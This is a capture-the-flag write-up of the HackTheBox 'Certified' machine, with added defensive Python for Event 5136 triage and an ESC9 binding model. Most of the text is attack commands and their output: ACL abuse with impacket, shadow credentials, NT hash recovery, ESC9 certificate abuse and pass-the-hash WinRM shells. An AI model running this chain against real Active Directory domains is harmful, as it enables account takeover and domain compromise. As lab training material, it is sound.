
HackTheBox - Certified

Certified provides credentials for a first user. With these, we abuse WriteOwner and GenericWrite to gain access to a second user, who has GenericAll over another user; through that we gain access to a third user. With this last one we identify ESC9 and, after exploiting it, we gain access as Administrator.

Name: Certified
OS: Windows
Points: 30
Difficulty: Medium
Release date: 2024-11-02
IP: 10.10.11.41
Maker: ruycr4ft
Rated: user-rated difficulty chart (most votes at Medium)

Machine Information

As is common in real life Windows pentests, you will start this box with credentials for the following account: judith.mader / judith09

Recon

nmap

nmap shows the ports typical of a domain controller: DNS (53), Kerberos (88), RPC (135), SMB (139/445), LDAP and LDAPS (389/636 and the global catalog on 3268/3269), kpasswd (464) and .NET message framing (9389), plus several high RPC ports. The LDAP certificates name the host DC01.certified.htb and the domain certified.htb.

# Nmap 7.95 scan initiated Sun Feb  2 00:30:12 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,3268,3269,9389,49666,49668,49673,49674,49681,49716,49741,49774 -sV -sC -oN nmap_scan 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.088s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-02 12:30:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-02-02T12:31:53+00:00; +7h00m03s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
49774/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=2/2%Time=679F02F9%P=x86_64-pc-linux-gnu%r(DNS-S
SF:D-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_
SF:udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m03s, deviation: 0s, median: 7h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-02-02T12:31:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb  2 00:31:50 2025 -- 1 IP address (1 host up) scanned in 97.89 seconds

SMB & LDAP

crackmapexec shows that the credentials have access to SMB.

❯ crackmapexec smb 10.10.11.41 -u "judith.mader" -p "judith09" --shares
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             [+] Enumerated shares
SMB         10.10.11.41     445    DC01             Share           Permissions     Remark
SMB         10.10.11.41     445    DC01             -----           -----------     ------
SMB         10.10.11.41     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.41     445    DC01             C$                              Default share
SMB         10.10.11.41     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.41     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.41     445    DC01             SYSVOL          READ            Logon server share 

The same credentials also bind to the LDAP service.

❯ ldapsearch -H ldap://certified.htb -D 'judith.mader@certified.htb' -w judith09 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=certified,DC=htb
namingcontexts: CN=Configuration,DC=certified,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=certified,DC=htb
namingcontexts: DC=DomainDnsZones,DC=certified,DC=htb
namingcontexts: DC=ForestDnsZones,DC=certified,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Bloodhound

We run bloodhound-python with judith's credentials, specifying zip compression so the output can be imported into BloodHound.

❯ bloodhound-python -u judith.mader -p "judith09" -ns 10.10.11.41 -d certified.htb -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.certified.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250204061108_bloodhound.zip

Path to Admin

BloodHound's 'Shortest path to here from Owned' suggests a path to Administrator, first gaining access as management_svc.


Judith has WriteOwner over the Management group, and that group has GenericWrite over management_svc; with these two permissions we can reach that user.


User - management_svc

Ownership & Full Control over Management

We run owneredit and dacledit to gain control over the Management group.

# Granting Ownership
❯ impacket-owneredit -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
# Granting Full Control
❯ impacket-dacledit -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250204-064047.bak
[*] DACL modified successfully!

Having control over the group, we can add Judith to it; then we check the group's members.

# Add judith to Management group
❯ net rpc group addmem "Management" "judith.mader" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41

# Check members of Management group
❯ net rpc group MEMBERS "Management" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
CERTIFIED\judith.mader
CERTIFIED\management_svc

Shadow Credentials

BloodHound recommends Targeted Kerberoast and Shadow Credentials. We use pywhisker, after fixing an error in the OpenSSL.crypto module by installing openssl 24 and cryptography 41.

Running pywhisker with the list action shows the msDS-KeyCredentialLink attribute as empty. Running it again with the add action succeeds, and it also produces a certificate that can be used to obtain a TGT with PKINITtools.

# action: list
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
# action: add
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: bdb48b22-e092-48a0-876b-936d641db4b6
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Mu21Nexs.pfx
[*] Must be used with password: PHbokfyjxLWtcP4yNyQe
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
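From the defender's side, each step so far writes a directory attribute that a domain controller with the "Audit Directory Service Changes" subcategory enabled records as Event ID 5136: the owner and DACL rewrite on Management (nTSecurityDescriptor), the member addition (member) and the pywhisker write (msDS-KeyCredentialLink); the same event source also catches the userPrincipalName rewrite used later in the Privesc section. The Python below is an added example, not part of the original writeup or of any of the tools used here; the events it processes are constructed to match those steps, and the OperationType codes are the ones Event 5136 uses for "Value Added" and "Value Deleted".

```python
"""Triage of Directory Service Changes events (Event ID 5136) for the
attribute writes this chain produces: the owner/DACL rewrite on the
Management group, the member addition, the msDS-KeyCredentialLink write
(shadow credentials) and the later userPrincipalName rewrite.
Added example; the events below are constructed, not captured from the box."""
from dataclasses import dataclass

# OperationType values logged by Event 5136
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

# Groups whose DACL/membership changes are escalated (constructed list for this domain)
WATCHED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators", "Management"}


@dataclass(frozen=True)
class Finding:
    severity: str
    rule: str
    subject: str   # account that made the change (SubjectUserName)
    target: str    # CN of the object that was changed
    detail: str


def cn_of(dn: str) -> str:
    """Leading RDN value of a DN ('CN=Management,CN=Users,...' -> 'Management')."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def triage_5136(events, watched_groups=WATCHED_GROUPS):
    """Return findings for a list of 5136 events (dicts keyed by the event's XML field names)."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
            continue  # a replaced attribute logs a Deleted/Added pair; act on the Added half only
        attr = ev["AttributeLDAPDisplayName"]
        cls = ev["ObjectClass"]
        subject = ev["SubjectUserName"]
        target = cn_of(ev["ObjectDN"])
        value = ev.get("AttributeValue", "")

        if attr == "nTSecurityDescriptor":
            # Owner or DACL rewritten: what owneredit/dacledit leave behind
            sev = "high" if cls == "group" and target in watched_groups else "medium"
            findings.append(Finding(sev, "owner-or-dacl-rewrite", subject, target,
                                    f"security descriptor rewritten on {cls}"))
        elif attr == "member" and cls == "group":
            # Membership change; the attribute value is the DN of the new member
            sev = "high" if target in watched_groups else "low"
            findings.append(Finding(sev, "group-member-added", subject, target, f"added {cn_of(value)}"))
        elif attr == "msDS-KeyCredentialLink":
            # A key credential written by a principal other than the account itself is the
            # shadow-credentials pattern. Heuristic: compares SubjectUserName with the CN;
            # resolve the ObjectDN to its sAMAccountName before alerting in production.
            if subject.lower() != target.lower():
                findings.append(Finding("high", "shadow-credentials", subject, target,
                                        "key credential written by another principal"))
        elif attr == "userPrincipalName":
            # Heuristic: a UPN with no realm suffix, or whose local part does not match the
            # object, is the ESC9/ESC10 precursor; review before acting.
            local = value.split("@", 1)[0]
            if "@" not in value or local.lower() != target.lower():
                findings.append(Finding("high", "upn-rewrite", subject, target, f"UPN set to {value!r}"))
    return findings


def _ev(subject, dn, cls, attr, op, value):
    return {"EventID": 5136, "SubjectUserName": subject, "ObjectDN": dn, "ObjectClass": cls,
            "AttributeLDAPDisplayName": attr, "OperationType": op, "AttributeValue": value}


MGMT = "CN=Management,CN=Users,DC=certified,DC=htb"
# Constructed events in the order an analyst would see them for this chain (DNs and the
# 'helpdesk' account are made up; the last event is a benign change that yields no finding)
SAMPLE_EVENTS = [
    _ev("judith.mader", MGMT, "group", "nTSecurityDescriptor", VALUE_DELETED, "<old descriptor, constructed>"),
    _ev("judith.mader", MGMT, "group", "nTSecurityDescriptor", VALUE_ADDED, "<new descriptor, constructed>"),
    _ev("judith.mader", MGMT, "group", "member", VALUE_ADDED, "CN=judith.mader,CN=Users,DC=certified,DC=htb"),
    _ev("judith.mader", "CN=management service,CN=Users,DC=certified,DC=htb", "user",
        "msDS-KeyCredentialLink", VALUE_ADDED, "B:854:<key credential blob, constructed>"),
    _ev("management_svc", "CN=ca_operator,CN=Users,DC=certified,DC=htb", "user",
        "userPrincipalName", VALUE_ADDED, "Administrator"),
    _ev("helpdesk", "CN=judith.mader,CN=Users,DC=certified,DC=htb", "user", "description", VALUE_ADDED, "Finance"),
]

if __name__ == "__main__":
    for f in triage_5136(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.subject} -> {f.target} ({f.detail})")
```

Both comparisons are heuristics: resolve the ObjectDN to a sAMAccountName before alerting, and expect a matching Deleted/Added pair whenever an attribute is replaced rather than appended, which is why the function only acts on the Added half.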

TGT management_svc - PKINITtools

We request the ticket with gettgtpkinit, passing the certificate and password generated above.

# TGT request
❯ python ../tools/PKINITtools/gettgtpkinit.py -cert-pfx Mu21Nexs.pfx -pfx-pass PHbokfyjxLWtcP4yNyQe certified.htb/management_svc Mu21Nexs.ccache
2025-02-04 07:11:59,908 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-04 07:11:59,918 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-04 07:12:15,347 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-04 07:12:15,348 minikerberos INFO     a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
INFO:minikerberos:a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
2025-02-04 07:12:15,349 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Recover the NT Hash - PKINITtools

getnthash lets us recover management_svc's NT hash by specifying the ticket and the AS-REP key.

# Recover the NT Hash
export KRB5CCNAME=Mu21Nexs.ccache; python3 ../tools/PKINITtools/getnthash.py -key a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52 certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584

TGT & NT Hash - Certipy

We can also obtain the ticket and the hash using Certipy.

# TGT & NT Hash
❯ certipy-ad cert -export -pfx Mu21Nexs.pfx -password "PHbokfyjxLWtcP4yNyQe" -out unprotected_pfx.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unprotected_pfx.pfx'
❯ certipy-ad auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "CERTIFIED.HTB"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584

Shadow Credentials - Certipy

Likewise, we can perform Shadow Credentials with Certipy, which directly yields management_svc's TGT and NT hash.

# auto shadow credentials - certipy
❯ certipy-ad shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '97ceda79-c6f7-d035-510c-84dbe64975a2'
[*] Adding Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

Shell

We use the hash against the WinRM service, gaining access to the machine and the user.txt flag.

❯ evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Documents> dir ../Desktop


    Directory: C:\Users\management_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/1/2025   8:17 AM             34 user.txt


*Evil-WinRM* PS C:\Users\management_svc\Documents> cat ../Desktop/user.txt
4ce4958305057e0df7e34a30d7c9b4e0
*Evil-WinRM* PS C:\Users\management_svc\Documents>

User - ca_operator

BloodHound shows and suggests DCSync over the domain, but management_svc is not a member of Domain Admins.


The only reachable user is ca_operator; management_svc has GenericAll over it.


Shadow Credentials

BloodHound suggests Shadow Credentials; we use Certipy to carry out this attack and obtain this user's hash.

❯ certipy-ad shadow auto -u management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7895b679-029c-6a52-eb80-d38aaa80b34b'
[*] Adding Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

ESC9

With ca_operator's hash we run Certipy to look for vulnerable templates. CertifiedAuthentication is vulnerable to ESC9.

❯ certipy-ad find -vulnerable -u ca_operator@certified.htb -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : NoSecurityExtension
                                          AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Property Principals       : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
    [!] Vulnerabilities
      ESC9                              : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension

Privesc

To exploit ESC9 we need GenericWrite over another account. That applies here, since we have GenericAll over ca_operator, and that account has enrollment rights on the vulnerable certificate template.
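Why this works, and what closes it, can be checked offline against the certipy output above. The Python below is an added example, not certipy's or the writeup's code: esc9_check applies the ESC9 preconditions to the CertifiedAuthentication record transcribed from the enumeration output, and map_certificate is a simplified model of how the KDC binds a client-authentication certificate to an account under the three StrongCertificateBindingEnforcement settings of the Kdc service. The account list, the ca_operator RID and the certificate records are constructed; the domain SID prefix is the one shown in the owneredit output.

```python
"""ESC9 assessment plus a simplified model of the KDC certificate-to-account
binding. Added example: the template record is transcribed from the certipy
'find' output; the accounts, the ca_operator RID and the certificates are
constructed."""

# Principals whose enrollment rights do not make a template exposed
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators", "Administrator"}

# Transcribed from the certipy 'find' output for CertifiedAuthentication
CERTIFIED_AUTHENTICATION = {
    "Template Name": "CertifiedAuthentication",
    "Enabled": True,
    "Client Authentication": True,
    "Enrollee Supplies Subject": False,
    "Certificate Name Flag": ["SubjectRequireDirectoryPath", "SubjectAltRequireUpn"],
    "Enrollment Flag": ["NoSecurityExtension", "AutoEnrollment", "PublishToDs"],
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Enrollment Rights": ["operator ca", "Domain Admins", "Enterprise Admins"],
}


def esc9_check(tpl, privileged=PRIVILEGED):
    """Return (exposed, notes). A template is ESC9-exposed only when every
    precondition holds: enabled, issues client-auth certificates, builds the SAN
    from the account's UPN or DNS name, suppresses the szOID_NTDS_CA_SECURITY_EXT
    (SID) extension, and is enrollable by a non-privileged principal with no
    approval or co-signature."""
    low_priv = sorted(p for p in tpl["Enrollment Rights"] if p not in privileged)
    name_flags = set(tpl["Certificate Name Flag"])
    conditions = {
        "template enabled": tpl["Enabled"],
        "client authentication EKU": tpl["Client Authentication"],
        "SAN derived from account UPN/DNS": bool(name_flags & {"SubjectAltRequireUpn", "SubjectAltRequireDns"}),
        "SID security extension suppressed": "NoSecurityExtension" in tpl["Enrollment Flag"],
        "no manager approval": not tpl["Requires Manager Approval"],
        "no authorized signatures": tpl["Authorized Signatures Required"] == 0,
        "enrollable by a non-privileged principal": bool(low_priv),
    }
    failed = [name for name, ok in conditions.items() if not ok]
    if failed:
        return False, [f"not ESC9: '{name}' does not hold" for name in failed]
    return True, [f"ESC9: {', '.join(low_priv)} can enroll and the template has no security extension"]


def map_certificate(cert, accounts, enforcement):
    """Simplified model of how the KDC binds a client-auth certificate to an
    account. 'enforcement' is StrongCertificateBindingEnforcement under
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc: 0 disabled, 1 compatibility,
    2 full enforcement. Returns (sAMAccountName or None, binding kind)."""
    sid = cert.get("sid")  # contents of the szOID_NTDS_CA_SECURITY_EXT extension, if present
    if sid is not None:
        # Strong binding: the SID in the certificate decides, whatever the UPN says
        for a in accounts:
            if a["objectSid"] == sid:
                return a["sAMAccountName"], "strong"
        return None, "rejected"
    if enforcement == 2:
        # Full enforcement: a certificate without the SID extension is not accepted
        return None, "rejected"
    # Weak binding by UPN (compatibility mode logs Kerberos-Key-Distribution-Center
    # event 39 for this case). A UPN with no realm suffix is treated here as an
    # implicit sAMAccountName, which is the behaviour the writeup relies on.
    upn = cert["upn"].lower()
    for a in accounts:
        if a["userPrincipalName"].lower() == upn:
            return a["sAMAccountName"], "weak"
    if "@" not in upn:
        for a in accounts:
            if a["sAMAccountName"].lower() == upn:
                return a["sAMAccountName"], "weak"
    return None, "unmapped"


DOMAIN_SID = "S-1-5-21-729746778-2675978091-3820388244"  # from the owneredit output
ACCOUNTS = [  # constructed directory; RID 500 is the built-in Administrator, 1106 is made up
    {"sAMAccountName": "Administrator", "userPrincipalName": "Administrator@certified.htb",
     "objectSid": f"{DOMAIN_SID}-500"},
    {"sAMAccountName": "ca_operator", "userPrincipalName": "ca_operator@certified.htb",
     "objectSid": f"{DOMAIN_SID}-1106"},
]
# Certificate as issued in the writeup: UPN rewritten to 'Administrator', no SID extension
ESC9_CERT = {"upn": "Administrator", "sid": None}
# The same request against a template that keeps the security extension
BOUND_CERT = {"upn": "Administrator", "sid": f"{DOMAIN_SID}-1106"}

if __name__ == "__main__":
    print(esc9_check(CERTIFIED_AUTHENTICATION))
    for mode in (0, 1, 2):
        print(mode, map_certificate(ESC9_CERT, ACCOUNTS, mode), map_certificate(BOUND_CERT, ACCOUNTS, mode))
```

Run as written, the template reports ESC9 exactly as certipy does; the certificate that maps to Administrator in compatibility mode is rejected under full enforcement (value 2), and a certificate that carries the SID extension binds to ca_operator no matter what UPN it names. That is why removing NoSecurityExtension from the template or enforcing strong binding on the KDC are the fixes.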

Having ca_operator's hash, we begin by changing ca_operator's userPrincipalName to Administrator.

❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

As ca_operator, we request a certificate from the vulnerable CertifiedAuthentication template.

❯ certipy-ad req -u ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca "certified-DC01-CA" -template CertifiedAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

We restore the original userPrincipalName value of the ca_operator user.

❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operater@certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operater@certified.htb
[*] Successfully updated 'ca_operator'

Now, with the certificate we requested earlier, we try to obtain administrator's hash.

❯ certipy-ad auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

Shell

With the hash we gain access as administrator and obtain the root.txt flag.

❯ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -s .
                                        
Evil-WinRM shell v3.7
                                        
